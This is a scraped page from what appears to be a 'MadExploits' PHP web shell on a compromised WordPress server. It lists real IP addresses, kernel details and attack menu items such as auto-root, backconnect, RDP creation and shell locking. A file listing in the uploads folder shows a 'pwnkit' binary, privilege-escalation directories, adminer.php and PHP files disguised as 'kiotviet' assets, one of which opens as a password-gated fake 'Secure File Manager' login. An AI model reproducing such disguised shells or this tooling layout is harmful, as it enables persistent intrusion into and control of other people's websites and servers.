Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aodai.devttt.com /
public_html /
wp-content /
uploads /
2026 /
01 /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.privdayz-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
kiotviet_3f9c8525089c048a245a0...
807
B
-rw-r--r--
kiotviet_692d00b3eedca807d3fe7...
61.12
KB
-rw-r--r--
kiotviet_8ae9754c636a59922575d...
1.73
KB
-rw-r--r--
kiotviet_8ca2b9410c81d0897832c...
57.64
KB
-rw-r--r--
kiotviet_a1863e88ff3f88346b186...
8.88
KB
-rw-r--r--
kiotviet_b772677d917e9d7c65180...
2.09
KB
-rw-r--r--
pwnkit
17.62
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : kiotviet_b772677d917e9d7c65180d8757b1b5bf.php
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>File Manager - Login</title> <link href='https://fonts.googleapis.com/css?family=Nunito' rel='stylesheet'> <style> body { background-color: #1a1a1a; color: #e1e1e1; font-family: 'Nunito', sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; } .login-box { background: #202832; padding: 40px; border-radius: 8px; box-shadow: 0 4px 6px rgba(0,0,0,0.3); text-align: center; } h3 { color: #68b723; margin-bottom: 30px; } input[type="password"] { background-color: #060a10; border: 1px solid #68b723; color: #fff; padding: 10px 15px; border-radius: 4px; outline: none; width: 250px; font-size: 14px; margin-bottom: 10px; } input[type="submit"] { background-color: #0d52bf; color: #fff; border: none; padding: 10px 30px; border-radius: 4px; cursor: pointer; font-size: 14px; } input[type="submit"]:hover { background-color: #002e99; } .error { color: #a10705; margin-top: 10px; } </style> </head> <body> <div class="login-box"> <h3>Secure File Manager</h3> <form method="post"> <input type="password" name="password" placeholder="Enter Password" required autofocus><br> <input type="submit" value="Login"> </form> </div> </body> </html>
Close